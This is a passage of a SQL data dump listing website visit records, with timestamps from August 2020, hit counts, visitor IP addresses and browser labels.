21','other'),(535259,1598341194,1,1,0,0,'31.13.127.9','other'),(535260,1598341195,1,1,0,0,'31.13.103.1','other'),(535261,1598341198,1,1,0,0,'31.13.127.10','other'),(535262,1598341251,1,1,0,0,'31.13.127.16','other'),(535263,1598341252,1,1,0,0,'31.13.127.8','other'),(535264,1598341334,1,1,0,0,'66.249.64.60','chrome'),(535265,1598341410,1,1,0,0,'31.13.127.11','other'),(535266,1598341474,1,1,0,0,'31.13.115.11','other'),(535267,1598341561,1,1,0,0,'91.196.178.166','other'),(535268,1598341609,1,1,0,0,'46.211.57.112','chrome'),(535269,1598341677,1,1,0,0,'31.13.127.7','other'),(535270,1598341864,1,1,0,0,'46.211.65.71','chrome'),(535271,1598341885,1,1,0,0,'46.211.23.20','chrome'),(535272,1598341899,2,2,0,0,'66.249.70.76','chrome'),(535273,1598341948,1,1,0,0,'95.134.189.12','chrome'),(535274,1598341988,1,1,0,0,'46.211.36.70','chrome'),(535275,1598342002,1,1,0,0,'128.124.52.119','chrome'),(535276,1598342024,1,1,0,0,'66.249.70.78','chrome'),(535277,1598342108,1,1,0,0,'195.10.210.70','chrome'),(535278,1598342197,3,3,0,0,'5.45.207.174','chrome'),(535279,1598342211,1,1,0,0,'66.220.149.116','other'),(535280,1598342268,1,1,0,0,'94.153.67.144','chrome'),(535281,1598342281,1,1,0,0,'195.10.210.49','other'),(535282,1598342385,1,1,0,0,'193.19.84.90','chrome'),(535283,1598342398,1,1,0,0,'88.155.156.146','chrome'),(535284,1598342428,1,1,0,0,'95.134.202.239','chrome'),(535285,1598342462,1,1,0,0,'91.196.178.164','chrome'),(535286,1598342537,1,1,0,0,'88.155.133.53','chrome'),(535287,1598342603,1,1,0,0,'91.196.177.11','other'),(535288,1598342639,1,1,0,0,'5.255.253.183','chrome'),(535289,1598342741,1,1,0,0,'37.73.91.19','chrome'),(535290,1598342840,1,1,0,0,'192.162.233.12','chrome'),(535291,1598343303,1,1,0,0,'94.153.68.4','chrome'),(535292,1598343466,1,1,0,0,'193.106.30.99','firefox'),(535293,1598343693,1,1,0,0,'5.45.207.92','chrome'),(535294,1598343748,1,1,0,0,'91.196.178.87','chrome'),(535295,1598344048,1,1,0,0,'5.45.207.174','chrome'),(535296,1598344232,1,1,0,0,'195.10.210.39','chrome'),(535297,1598344511,1,1,0,0,'209.17.97.26','other'),(535298,1598344524,2,2,0,0,'178.154.200.28','chrome'),(535299,1598344561,1,1,0,0,'91.196.178.92','chrome'),(535300,1598345052,2,2,0,0,'95.134.189.12','chrome'),(535301,1598345292,1,1,0,0,'46.211.48.220','chrome'),(535302,1598345428,1,1,0,0,'93.183.204.29','chrome'),(535303,1598345540,1,1,0,0,'95.158.49.201','chrome'),(535304,1598345578,1,1,0,0,'46.211.52.211','chrome'),(535305,1598345639,1,1,0,0,'94.153.1.42','chrome'),(535306,1598345671,1,1,0,0,'46.211.68.32','chrome'),(535307,1598345686,1,1,0,0,'176.9.47.122','firefox'),(535308,1598345921,1,1,0,0,'178.154.200.60','chrome'),(535309,1598346051,1,1,0,0,'195.10.210.70','chrome'),(535310,1598346053,1,1,0,0,'46.211.49.111','chrome'),(535311,1598346210,1,1,0,0,'95.134.189.12','chrome'),(535312,1598346234,1,1,0,0,'178.154.200.80','other'),(535313,1598346592,1,1,0,0,'66.249.70.76','chrome'),(535314,1598346651,1,1,0,0,'92.184.102.190','other'),(535315,1598346946,1,1,0,0,'213.180.203.85','chrome'),(535316,1598347065,1,1,0,0,'66.249.64.60','chrome'),(535317,1598347275,1,1,0,0,'46.211.54.222','chrome'),(535318,1598347312,8,8,0,0,'109.108.71.11','other'),(535319,1598347474,1,1,0,0,'46.211.42.155','chrome'),(535320,1598347746,1,1,0,0,'5.255.253.105','other'),(535321,1598347873,1,1,0,0,'17.58.99.7','other'),(535322,1598347923,1,1,0,0,'91.196.178.92','chrome'),(535323,1598348369,2,2,0,0,'5.45.207.92','chrome'),(535324,1598348577,2,2,0,0,'91.196.178.169','chrome'),(535325,1598348583,8,8,0,0,'109.108.71.11','other'),(535326,1598348598,1,1,0,0,'8.29.198.26','other'),(535327,1598348696,2,2,0,0,'66.249.70.78','chrome'),(535328,1598349459,1,1,0,0,'18.188.177.16','chrome'),(535329,1598349622,1,1,0,0,'178.154.200.80','other'),(535330,1598349849,8,8,0,0,'109.108.71.11','other'),(535331,1598350077,1,1,0,0,'5.255.253.151','chrome'),(535332,1598350358,1,1,0,0,'94.153.9.118','chrome'),(535333,1598351004,1,1,0,0,'178.154.200.80','chrome'),(535334,1598351135,8,8,0,0,'109.108.71.11','other'),(535335,1598351295,1,1,0,0,'93.119.227.91','other'),(535336,1598351296,1,1,0,0,'93.119.227.91','chrome'),(535337,1598351585,1,1,0,0,'173.252.87.8','other'),(535338,1598351714,1,1,0,0,'46.133.52.115','chrome'),(535339,1598351761,1,1,0,0,'66.220.149.116','other'),(535340,1598351785,1,1,0,0,'66.249.64.56','chrome'),(535341,1598351819,1,1,0,0,'46.211.61.104','chrome'),(535342,1598352282,1,1,0,0,'195.10.210.70','chrome'),(535343,1598352361,1,1,0,0,'66.249.64.58','chrome'),(535344,1598352471,8,8,0,0,'109.108.71.11','other'),(535345,1598353468,1,1,0,0,'128.124.41.69','chrome'),(535346,1598353485,2,2,0,0,'195.10.210.70','chrome'),(535347,1598353680,8,8,0,0,'109.108.71.11','other'),(535348,1598354324,1,1,0,0,'80.91.181.76','chrome'),(535349,1598354427,1,1,0,0,'213.180.203.85','other'),(535350,1598354613,2,2,0,0,'66.249.70.76','chrome'),(535351,1598354681,1,1,0,0,'213.180.203.85','chrome'),(535352,1598354698,2,2,0,0,'178.154.200.80','chrome'),(535353,1598354704,1,1,0,0,'46.211.20.112','chrome'),(535354,1598354757,1,1,0,0,'109.74.154.72','chrome'),(535355,1598354894,8,8,0,0,'109.108.71.11','other'),(535356,1598354945,1,1,0,0,'37.73.149.207','chrome'),(535357,1598355183,1,1,0,0,'207.46.13.71','other'),(535358,1598355206,1,1,0,0,'46.211.21.149','chrome'),(535359,1598355318,1,1,0,0,'178.154.200.124','chrome'),(535360,1598356121,8,8,0,0,'109.108.71.11','other'),(535361,1598356986,1,1,0,0,'37.73.136.148','chrome'),(535362,1598357159,1,1,0,0,'207.46.13.80','other'),(535363,1598357297,8,8,0,0,'109.108.71.11','other'),(535364,1598357369,1,1,0,0,'2.47.39.218','other'),(535365,1598358153,1,1,0,0,'66.249.70.78','chrome'),(535366,1598358313,1,1,0,0,'5.45.207.73','chrome'),(535367,1598358426,1,1,0,0,'5.45.207.109','chrome'),(535368,1598358495,8,8,0,0,'109.108.71.11','other'),(535369,1598358792,1,1,0,0,'178.154.200.80','chrome'),(535370,1598358917,1,1,0,0,'173.252.87.2','other'),(535371,1598359071,1,1,0,0,'46.211.24.109','chrome'),(535372,1598359427,1,1,0,0,'8.29.198.27','other'),(535373,1598359693,8,8,0,0,'109.108.71.11','other'),(535374,1598359716,1,1,0,0,'88.155.84.83','chrome'),(535375,1598359798,1,1,0,0,'195.10.210.70','chrome'),(535376,1598360712,1,1,0,0,'130.180.210.208','chrome'),(535377,1598360932,8,8,0,0,'109.108.71.11','other'),(535378,1598361164,2,2,0,0,'194.44.93.150','chrome'),(535379,1598361857,1,1,0,0,'195.191.139.72','chrome'),(535380,1598361968,1,1,0,0,'5.255.253.176','chrome'),(535381,1598362161,8,8,0,0,'109.108.71.11','other'),(535382,1598362212,1,1,0,0,'91.196.178.92','chrome'),(535383,1598362381,1,1,0,0,'213.180.203.85','chrome'),(535384,1598362424,1,1,0,0,'141.8.142.87','chrome'),(535385,1598362559,1,1,0,0,'46.211.47.178','chrome'),(535386,1598363205,2,2,0,0,'178.154.200.28','chrome'),(535387,1598363230,1,1,0,0,'5.255.253.136','chrome'),(535388,1598363265,2,2,0,0,'157.55.39.226','other'),(535389,1598363417,2,2,0,0,'195.191.139.72','chrome'),(535390,1598363511,8,8,0,0,'109.108.71.11','other'),(535391,1598363553,1,1,0,0,'207.46.13.71','other'),(535392,1598363619,1,1,0,0,'91.196.179.33','chrome'),(535393,1598363688,1,1,0,0,'94.153.74.146','chrome'),(535394,1598363916,1,1,0,0,'46.211.21.114','other'),(535395,1598364099,1,1,0,0,'178.154.200.156','other'),(535396,1598364255,1,1,0,0,'66.249.70.76','chrome'),(535397,1598364301,1,1,0,0,'131.220.6.152','chrome'),(535398,1598364548,1,1,0,0,'91.196.178.186','chrome'),(535399,1598364632,1,1,0,0,'37.73.175.24','other'),(535400,1598364732,8,8,0,0,'109.108.71.11','other'),(535401,1598364798,1,1,0,0,'178.154.200.124','chrome'),(535402,1598364983,1,1,0,0,'178.154.200.28','other'),(535403,1598365335,2,2,0,0,'213.180.203.75','chrome'),(535404,1598365739,1,1,0,0,'69.171.251.116','other'),(535405,1598365780,1,1,0,0,'141.8.142.85','other'),(535406,1598365854,2,2,0,0,'88.155.46.224','chrome'),(535407,1598365907,1,1,0,0,'66.249.70.76','chrome'),(535408,1598365967,8,8,0,0,'109.108.71.11','other'),(535409,1598366434,1,1,0,0,'207.46.13.52','other'),(535410,1598366442,2,2,0,0,'5.255.253.136','chrome'),(535411,1598366932,1,1,0,0,'5.255.253.105','other'),(535412,1598367275,8,8,0,0,'109.108.71.11','other'),(535413,1598367416,1,1,0,0,'5.255.253.183','chrome'),(535414,1598367434,1,1,0,0,'195.10.210.70','chrome'),(535415,1598368019,2,2,0,0,'5.255.253.105','chrome'),(535416,1598368102,1,1,0,0,'5.45.207.75','chrome'),(535417,1598368375,1,1,0,0,'5.255.253.183','chrome'),(535418,1598368480,1,1,0,0,'5.45.207.174','chrome'),(535419,1598368505,8,8,0,0,'109.108.71.11','other'),(535420,1598368652,1,1,0,0,'195.88.158.183','chrome'),(535421,1598369422,1,1,0,0,'5.45.207.174','chrome'),(535422,1598369728,8,8,0,0,'109.108.71.11','other'),(535423,1598369773,1,1,0,0,'69.171.251.28','other'),(535424,1598370254,1,1,0,0,'8.29.198.25','other'),(535425,1598370313,1,1,0,0,'178.154.200.32','chrome'),(535426,1598370558,1,1,0,0,'66.249.70.78','chrome'),(535427,1598370602,1,1,0,0,'5.45.207.174','chrome'),(535428,1598370737,1,1,0,0,'157.55.39.236','other'),(535429,1598370792,1,1,0,0,'95.158.10.124','chrome'),(535430,1598370992,8,8,0,0,'109.108.71.11','other'),(535431,1598371135,1,1,0,0,'66.249.64.58','chrome'),(535432,1598371424,1,1,0,0,'92.112.104.51','chrome'),(535433,1598371514,1,1,0,0,'66.249.64.60','chrome'),(535434,1598372003,1,1,0,0,'178.154.200.74','chrome'),(535435,1598372244,8,8,0,0,'109.108.71.11','other'),(535436,1598372352,1,1,0,0,'17.58.99.84','other'),(535437,1598372362,1,1,0,0,'91.196.178.170','chrome'),(535438,1598372423,1,0,1,0,'66.249.70.76',''),(535439,1598372845,1,1,0,0,'5.45.207.174','chrome'),(535440,1598372972,1,1,0,0,'17.58.99.7','other'),(535441,1598373149,1,1,0,0,'207.46.13.164','other'),(535442,1598373484,8,8,0,0,'109.108.71.11','other'),(535443,1598373564,1,1,0,0,'178.154.200.80','chrome'),(535444,1598373877,3,3,0,0,'5.45.207.174','chrome'),(535445,1598373906,1,1,0,0,'94.153.64.94','chrome'),(535446,1598373992,1,1,0,0,'91.196.178.185','other'),(535447,1598374035,1,1,0,0,'195.10.210.70','chrome'),(535448,1598374268,1,0,1,0,'66.249.70.80',''),(535449,1598374479,1,1,0,0,'66.249.64.58','chrome'),(535450,1598374508,1,1,0,0,'5.45.207.92','chrome'),(535451,1598374620,1,1,0,0,'185.109.53.102','firefox'),(535452,1598374716,8,8,0,0,'109.108.71.11','other'),(535453,1598375278,4,4,0,0,'66.249.70.80','chrome'),(535454,1598375570,1,1,0,0,'195.10.210.70','chrome'),(535455,1598375752,1,1,0,0,'178.150.8.82','chrome'),(535456,1598375956,8,8,0,0,'109.108.71.11','other'),(535457,1598375984,5,5,0,0,'66.249.70.78','chrome'),(535458,1598375995,7,7,0,0,'66.249.70.76','chrome'),(535459,1598376261,1,1,0,0,'5.255.253.136','other'),(535460,1598376354,2,2,0,0,'66.249.64.56','chrome'),(535461,1598376371,2,2,0,0,'66.249.70.80','chrome'),(535462,1598376585,1,1,0,0,'157.55.39.82','other'),(535463,1598376610,1,1,0,0,'207.46.13.70','other'),(535464,1598376769,1,1,0,0,'17.58.99.7','other'),(535465,1598377001,2,2,0,0,'66.249.70.76','chrome'),(535466,1598377055,1,1,0,0,'5.255.253.88','chrome'),(535467,1598377210,8,8,0,0,'109.108.71.11','other'),(535468,1598377410,1,1,0,0,'5.255.253.136','chrome'),(535469,1598377473,3,3,0,0,'66.249.70.78','chrome'),(535470,1598377499,1,1,0,0,'88.155.50.251','chrome'),(535471,1598377662,1,1,0,0,'207.46.13.164','other'),(535472,1598377728,1,1,0,0,'88.155.116.212','chrome'),(535473,1598378435,1,1,0,0,'178.154.200.32','chrome'),(535474,1598378510,1,1,0,0,'178.154.200.28','chrome'),(535475,1598378512,8,8,0,0,'109.108.71.11','other'),(535476,1598378707,2,2,0,0,'5.45.207.174','chrome'),(535477,1598379193,1,1,0,0,'66.249.64.56','chrome'),(535478,1598379317,1,1,0,0,'157.55.39.236','other'),(535479,1598379427,1,1,0,0,'66.249.70.80','chrome'),(535480,1598379584,1,1,0,0,'5.45.207.174','other'),(535481,1598379753,8,8,0,0,'109.108.71.11','other'),(535482,1598379856,1,1,0,0,'222.128.18.238','chrome'),(535483,1598380065,1,1,0,0,'82.145.211.235','other'),(535484,1598380647,1,1,0,0,'5.255.253.69','chrome'),(535485,1598380677,1,1,0,0,'157.55.39.221','other'),(535486,1598381016,8,8,0,0,'109.108.71.11','other'),(535487,1598381084,1,1,0,0,'8.29.198.26','other'),(535488,1598381763,1,1,0,0,'207.46.13.164','other'),(535489,1598382032,1,1,0,0,'66.249.70.76','chrome'),(535490,1598382246,8,8,0,0,'109.108.71.11','other'),(535491,1598382322,1,1,0,0,'207.46.13.91','other'),(535492,1598382526,1,1,0,0,'5.45.207.174','chrome'),(535493,1598382778,1,1,0,0,'91.196.178.79','chrome'),(535494,1598382780,1,1,0,0,'94.153.6.153','chrome'),(535495,1598382846,1,1,0,0,'17.58.99.7','other'),(535496,1598383308,1,1,0,0,'207.46.13.91','other'),(535497,1598383517,8,8,0,0,'109.108.71.11','other'),(535498,1598384404,1,1,0,0,'173.252.79.22','other'),(535499,1598384406,1,1,0,0,'173.252.111.16','other'),(535500,1598384576,1,1,0,0,'94.153.20.247','chrome'),(535501,1598384648,1,1,0,0,'207.46.13.91','other'),(535502,1598384722,1,1,0,0,'5.255.253.106','chrome'),(535503,1598384752,8,8,0,0,'109.108.71.11','other'),(535504,1598384842,1,1,0,0,'5.255.253.183','chrome'),(535505,1598385483,1,1,0,0,'207.46.13.70','other'),(535506,1598385956,1,1,0,0,'178.154.200.60','chrome'),(535507,1598385965,8,8,0,0,'109.108.71.11','other'),(535508,1598387031,1,1,0,0,'5.45.207.92','chrome'),(535509,1598387068,1,1,0,0,'207.46.13.70','other'),(535510,1598387169,8,8,0,0,'109.108.71.11','other'),(535511,1598387191,2,2,0,0,'5.255.253.136','chrome'),(535512,1598387556,2,2,0,0,'157.55.39.236','other'),(535513,1598388058,1,1,0,0,'178.154.200.28','chrome'),(535514,1598388264,2,2,0,0,'17.58.99.7','other'),(535515,1598388334,8,8,0,0,'109.108.71.11','other'),(535516,1598388345,1,1,0,0,'185.130.54.28','chrome'),(535517,1598388596,1,1,0,0,'5.255.253.151','chrome'),(535518,1598388885,1,1,0,0,'207.46.13.70','other'),(535519,1598389073,1,1,0,0,'157.55.39.236','other'),(535520,1598389116,1,1,0,0,'5.45.207.174','chrome'),(535521,1598389571,8,8,0,0,'109.108.71.11','other'),(535522,1598389625,1,1,0,0,'17.58.99.7','other'),(535523,1598389653,2,2,0,0,'5.45.207.92','chrome'),(535524,1598389766,1,1,0,0,'5.45.207.174','other'),(535525,1598390664,1,1,0,0,'178.154.200.28','other'),(535526,1598390758,8,8,0,0,'109.108.71.11','other'),(535527,1598390965,1,1,0,0,'5.45.207.174','chrome'),(535528,1598391532,1,1,0,0,'5.255.253.106','other'),(535529,1598391837,1,1,0,0,'5.255.253.136','other'),(535530,1598391911,1,1,0,0,'8.29.198.25','other'),(535531,1598391967,8,8,0,0,'109.108.71.11','other'),(535532,1598392109,2,2,0,0,'66.249.70.80','chrome'),(535533,1598392336,1,1,0,0,'45.92.23.169','other'),(535534,1598392628,2,2,0,0,'157.55.39.236','other'),(535535,1598392771,1,1,0,0,'178.154.200.48','chrome'),(535536,1598393182,8,8,0,0,'109.108.71.11','other'),(535537,1598393221,1,1,0,0,'173.252.111.118','other'),(535538,1598393402,1,1,0,0,'5.45.207.92','chrome'),(535539,1598393644,1,1,0,0,'5.45.207.92','other'),(535540,1598393812,1,1,0,0,'207.46.13.91','other'),(535541,1598394401,8,8,0,0,'109.108.71.11','other'),(535542,1598394597,1,1,0,0,'66.249.70.78','chrome'),(535543,1598395026,1,1,0,0,'178.154.200.28','chrome'),(535544,1598395569,2,2,0,0,'91.196.178.187','chrome'),(535545,1598395624,8,8,0,0,'109.108.71.11','other'),(535546,1598395823,1,1,0,0,'185.126.67.67','other'),(535547,1598395960,1,1,0,0,'178.154.200.28','chrome'),(535548,1598396165,1,1,0,0,'178.154.200.60','chrome'),(535549,1598396178,1,1,0,0,'5.45.207.92','chrome'),(535550,1598396452,1,1,0,0,'5.255.253.136','chrome'),(535551,1598396760,8,8,0,0,'109.108.71.11','other'),(535552,1598396786,1,1,0,0,'66.249.70.78','chrome'),(535553,1598397415,1,1,0,0,'5.255.253.136','chrome'),(535554,1598397601,1,1,0,0,'5.255.253.183','other'),(535555,1598397646,1,1,0,0,'207.46.13.52','other'),(535556,1598397933,1,1,0,0,'5.45.207.174','chrome'),(535557,1598397990,8,8,0,0,'109.108.71.11','other'),(535558,1598398481,1,1,0,0,'17.58.99.7','other'),(535559,1598399002,2,2,0,0,'66.249.70.80','chrome'),(535560,1598399050,1,1,0,0,'66.249.70.76','chrome'),(535561,1598399141,8,8,0,0,'109.108.71.11','other'),(535562,1598399161,1,1,0,0,'178.154.200.28','chrome'),(535563,1598399283,1,1,0,0,'5.45.207.92','chrome'),(535564,1598399682,1,1,0,0,'5.45.207.174','chrome'),(535565,1598399709,1,1,0,0,'62.205.134.182','other'),(535566,1598399928,1,1,0,0,'178.154.200.60','chrome'),(535567,1598400313,8,8,0,0,'109.108.71.11','other'),(535568,1598400428,1,1,0,0,'5.255.253.106','chrome'),(535569,1598400580,1,1,0,0,'5.255.253.88','chrome'),(535570,1598400609,1,1,0,0,'17.58.99.7','other'),(535571,1598400711,2,2,0,0,'5.255.253.136','chrome'),(535572,1598401117,1,1,0,0,'66.249.70.76','chrome'),(535573,1598401570,8,8,0,0,'109.108.71.11','other'),(535574,1598401684,1,1,0,0,'5.45.207.174','other'),(535575,1598401976,2,2,0,0,'66.249.70.78','chrome'),(535576,1598402019,3,3,0,0,'5.45.207.174','chrome'),(535577,1598402248,2,2,0,0,'66.249.70.76','chrome'),(535578,1598402250,1,1,0,0,'207.46.13.91','other'),(535579,1598402730,1,1,0,0,'8.29.198.27','other'),(535580,1598402767,8,8,0,0,'109.108.71.11','other'),(535581,1598402898,1,1,0,0,'5.255.253.69','chrome'),(535582,1598403262,1,1,0,0,'178.154.200.28','chrome'),(535583,1598403363,1,1,0,0,'178.154.200.48','chrome'),(535584,1598403511,1,1,0,0,'5.45.207.174','chrome'),(535585,1598403925,8,8,0,0,'109.108.71.11','other'),(535586,1598404232,1,1,0,0,'5.45.207.92','chrome'),(535587,1598404560,1,1,0,0,'69.4.89.106','chrome'),(535588,1598404561,1,1,0,0,'69.4.89.106','other'),(535589,1598404883,1,1,0,0,'157.55.39.236','other'),(535590,1598404951,2,2,0,0,'178.154.200.28','chrome'),(535591,1598405102,8,8,0,0,'109.108.71.11','other'),(535592,1598405261,4,4,0,0,'66.249.70.80','chrome'),(535593,1598405348,4,4,0,0,'66.249.70.76','chrome'),(535594,1598405429,2,2,0,0,'66.249.70.78','chrome'),(535595,1598405647,1,1,0,0,'5.255.253.136','chrome'),(535596,1598405793,1,1,0,0,'207.46.13.70','other'),(535597,1598406131,1,1,0,0,'5.45.207.174','chrome'),(535598,1598406300,8,8,0,0,'109.108.71.11','other'),(535599,1598406662,1,1,0,0,'5.255.253.136','chrome'),(535600,1598406887,2,2,0,0,'66.249.70.78','chrome'),(535601,1598407063,2,2,0,0,'178.154.200.28','chrome'),(535602,1598407186,1,1,0,0,'134.19.179.235','other'),(535603,1598407187,3,3,0,0,'66.249.70.76','chrome'),(535604,1598407479,8,8,0,0,'109.108.71.11','other'),(535605,1598407506,1,1,0,0,'66.249.70.80','chrome'),(535606,1598407831,2,2,0,0,'5.45.207.174','chrome'),(535607,1598408018,1,1,0,0,'5.255.253.136','chrome'),(535608,1598408085,1,1,0,0,'5.45.207.92','chrome'),(535609,1598408395,1,1,0,0,'5.45.207.174','other'),(535610,1598408412,2,2,0,0,'178.154.200.28','chrome'),(535611,1598408554,1,1,0,0,'157.55.39.82','other'),(535612,1598408663,8,8,0,0,'109.108.71.11','other'),(535613,1598408746,2,2,0,0,'66.249.70.80','chrome'),(535614,1598409029,1,1,0,0,'66.249.64.58','chrome'),(535615,1598409828,8,8,0,0,'109.108.71.11','other'),(535616,1598409985,19,19,0,0,'217.160.65.177','other'),(535617,1598410022,2,2,0,0,'52.42.134.174','other'),(535618,1598410378,1,1,0,0,'66.249.64.58','chrome'),(535619,1598410600,1,1,0,0,'5.45.207.174','chrome'),(535620,1598410699,1,1,0,0,'66.249.64.56','chrome'),(535621,1598410925,20,20,0,0,'217.160.65.177','other'),(535622,1598410992,8,8,0,0,'109.108.71.11','other'),(535623,1598411864,8,8,0,0,'217.160.65.177','other'),(535624,1598411934,1,1,0,0,'178.154.200.28','other'),(535625,1598411962,1,1,0,0,'5.255.253.136','chrome'),(535626,1598412234,8,8,0,0,'109.108.71.11','other'),(535627,1598412664,1,1,0,0,'5.255.253.105','chrome'),(535628,1598412748,2,2,0,0,'5.45.207.92','chrome'),(535629,1598412749,1,1,0,0,'66.249.70.80','chrome'),(535630,1598412770,2,2,0,0,'66.249.70.76','chrome'),(535631,1598412883,1,1,0,0,'195.10.210.70','chrome'),(535632,1598412896,2,2,0,0,'66.249.70.78','chrome'),(535633,1598413447,4,4,0,0,'178.154.200.28','chrome'),(535634,1598413535,8,8,0,0,'109.108.71.11','other'),(535635,1598413560,1,1,0,0,'8.29.198.26','other'),(535636,1598413689,1,1,0,0,'46.211.64.82','chrome'),(535637,1598413827,1,1,0,0,'5.45.207.92','chrome'),(535638,1598414292,1,1,0,0,'5.255.253.151','chrome'),(535639,1598414440,1,1,0,0,'66.249.70.80','chrome'),(535640,1598414505,2,2,0,0,'66.249.70.76','chrome'),(535641,1598414522,1,1,0,0,'66.249.70.78','chrome'),(535642,1598414738,8,8,0,0,'109.108.71.11','other'),(535643,1598414891,1,1,0,0,'207.46.13.91','other'),(535644,1598415515,2,2,0,0,'195.10.210.70','chrome'),(535645,1598415689,1,1,0,0,'5.45.207.174','chrome'),(535646,1598416071,2,2,0,0,'66.249.70.80','chrome'),(535647,1598416098,3,3,0,0,'178.154.200.28','chrome'),(535648,1598416175,5,5,0,0,'66.249.70.78','chrome'),(535649,1598416194,1,1,0,0,'5.45.207.92','chrome'),(535650,1598416268,2,2,0,0,'66.249.64.58','chrome'),(535651,1598416729,2,2,0,0,'66.249.64.56','chrome'),(535652,1598417614,1,1,0,0,'128.124.128.9','chrome'),(535653,1598417752,2,2,0,0,'66.249.70.76','chrome'),(535654,1598417798,8,8,0,0,'109.108.71.11','other'),(535655,1598418002,1,1,0,0,'66.249.70.80','chrome'),(535656,1598418010,1,1,0,0,'5.45.207.92','chrome'),(535657,1598418026,1,1,0,0,'62.205.134.182','other'),(535658,1598418135,1,1,0,0,'131.220.6.152','chrome'),(535659,1598418427,1,1,0,0,'37.73.77.82','chrome'),(535660,1598418546,1,1,0,0,'62.4.37.108','other'),(535661,1598418877,1,1,0,0,'31.13.103.20','other'),(535662,1598418878,1,1,0,0,'31.13.103.118','other'),(535663,1598419082,8,8,0,0,'109.108.71.11','other'),(535664,1598420009,1,1,0,0,'66.249.70.78','chrome'),(535665,1598420226,1,1,0,0,'66.249.70.80','chrome'),(535666,1598420268,8,8,0,0,'109.108.71.11','other'),(535667,1598421353,1,1,0,0,'66.249.70.78','chrome'),(535668,1598421411,8,8,0,0,'109.108.71.11','other'),(535669,1598421524,1,1,0,0,'207.46.13.91','other'),(535670,1598421588,1,1,0,0,'91.196.178.92','chrome'),(535671,1598421869,1,1,0,0,'66.249.70.80','chrome'),(535672,1598422138,1,1,0,0,'207.46.13.112','other'),(535673,1598422648,8,8,0,0,'109.108.71.11','other'),(535674,1598423070,1,1,0,0,'91.196.178.92','chrome'),(535675,1598423670,2,2,0,0,'159.224.213.151','chrome'),(535676,1598423810,1,1,0,0,'66.249.70.76','chrome'),(535677,1598423868,8,8,0,0,'109.108.71.11','other'),(535678,1598424158,2,1,1,0,'66.249.70.78',''),(535679,1598424387,1,1,0,0,'8.29.198.26','other'),(535680,1598425104,8,8,0,0,'109.108.71.11','other'),(535681,1598425430,1,1,0,0,'66.249.70.78','chrome'),(535682,1598425566,2,2,0,0,'66.249.64.58','chrome'),(535683,1598426027,1,1,0,0,'91.196.178.168','chrome'),(535684,1598426268,1,1,0,0,'91.124.183.194','chrome'),(535685,1598426308,1,1,0,0,'66.249.70.80','chrome'),(535686,1598426338,1,1,0,0,'91.196.177.15','chrome'),(535687,1598426437,8,8,0,0,'109.108.71.11','other'),(535688,1598426449,1,1,0,0,'66.249.70.76','chrome'),(535689,1598426766,2,2,0,0,'91.196.178.183','chrome'),(535690,1598427399,1,1,0,0,'66.249.70.78','chrome'),(535691,1598427562,1,1,0,0,'66.249.70.80','chrome'),(535692,1598427660,1,1,0,0,'31.13.127.7','other'),(535693,1598427764,8,8,0,0,'109.108.71.11','other'),(535694,1598427775,1,1,0,0,'91.196.178.168','chrome'),(535695,1598429053,8,8,0,0,'109.108.71.11','other'),(535696,1598429204,1,1,0,0,'66.249.70.80','chrome'),(535697,1598430363,8,8,0,0,'109.108.71.11','other'),(535698,1598430487,1,1,0,0,'157.55.39.88','other'),(535699,1598430570,1,1,0,0,'66.249.64.58','chrome'),(535700,1598430750,1,1,0,0,'91.196.178.92','chrome'),(535701,1598431165,1,1,0,0,'207.46.13.52','other'),(535702,1598431455,1,1,0,0,'200.52.71.198','chrome'),(535703,1598431663,8,8,0,0,'109.108.71.11','other'),(535704,1598432988,8,8,0,0,'109.108.71.11','other'),(535705,1598433011,1,1,0,0,'195.10.210.70','chrome'),(535706,1598433642,1,1,0,0,'66.220.149.33','other'),(535707,1598434283,1,1,0,0,'134.202.64.160','chrome'),(535708,1598434290,1,1,0,0,'155.94.171.98','chrome'),(535709,1598434320,8,8,0,0,'109.108.71.11','other'),(535710,1598434556,3,3,0,0,'66.249.70.76','chrome'),(535711,1598435218,1,1,0,0,'8.29.198.26','other'),(535712,1598435286,1,1,0,0,'94.153.16.140','chrome'),(535713,1598435606,8,8,0,0,'109.108.71.11','other'),(535714,1598436393,1,1,0,0,'66.249.70.78','chrome'),(535715,1598436622,2,2,0,0,'66.249.70.76','chrome'),(535716,1598436891,8,8,0,0,'109.108.71.11','other'),(535717,1598437524,1,1,0,0,'66.249.70.76','chrome'),(535718,1598438194,8,8,0,0,'109.108.71.11','other'),(535719,1598439598,8,8,0,0,'109.108.71.11','other'),(535720,1598439609,1,1,0,0,'109.74.154.72','chrome'),(535721,1598440467,1,1,0,0,'66.249.64.60','chrome'),(535722,1598440667,2,2,0,0,'95.213.141.126','opera'),(535723,1598440884,8,8,0,0,'109.108.71.11','other'),(535724,1598440911,2,2,0,0,'95.134.189.24','chrome'),(535725,1598441257,1,1,0,0,'176.111.33.18','firefox'),(535726,1598441878,1,1,0,0,'95.134.189.24','chrome'),(535727,1598442153,8,8,0,0,'109.108.71.11','other'),(535728,1598442386,2,2,0,0,'66.249.70.78','chrome'),(535729,1598442457,1,1,0,0,'66.249.70.76','chrome'),(535730,1598443255,1,1,0,0,'91.196.178.92','chrome'),(535731,1598443459,1,1,0,0,'88.155.190.227','chrome'),(535732,1598443520,8,8,0,0,'109.108.71.11','other'),(535733,1598444345,1,1,0,0,'173.252.95.2','other'),(535734,1598444981,8,8,0,0,'109.108.71.11','other'),(535735,1598445963,2,2,0,0,'95.134.189.24','chrome'),(535736,1598446047,1,1,0,0,'8.29.198.27','other'),(535737,1598446484,8,8,0,0,'109.108.71.11','other'),(535738,1598447055,1,1,0,0,'69.171.251.1','other'),(535739,1598447056,1,1,0,0,'69.171.251.118','other'),(535740,1598447275,1,1,0,0,'91.196.178.92','chrome'),(535741,1598448150,8,8,0,0,'109.108.71.11','other'),(535742,1598448255,1,0,1,0,'66.249.70.76',''),(535743,1598448270,1,1,0,0,'66.249.70.78','chrome'),(535744,1598448370,2,2,0,0,'17.58.99.84','other'),(535745,1598448760,1,1,0,0,'66.249.64.58','chrome'),(535746,1598449453,1,1,0,0,'91.196.178.73','chrome'),(535747,1598449735,8,8,0,0,'109.108.71.11','other'),(535748,1598450543,2,2,0,0,'66.249.70.76','chrome'),(535749,1598450654,1,1,0,0,'157.55.39.88','other'),(535750,1598450940,1,1,0,0,'185.77.207.168','chrome'),(535751,1598451276,8,8,0,0,'109.108.71.11','other'),(535752,1598451419,2,2,0,0,'66.249.64.58','chrome'),(535753,1598451978,1,1,0,0,'157.55.39.82','other'),(535754,1598451993,1,1,0,0,'207.46.13.164','other'),(535755,1598452482,1,1,0,0,'17.58.99.7','other'),(535756,1598452632,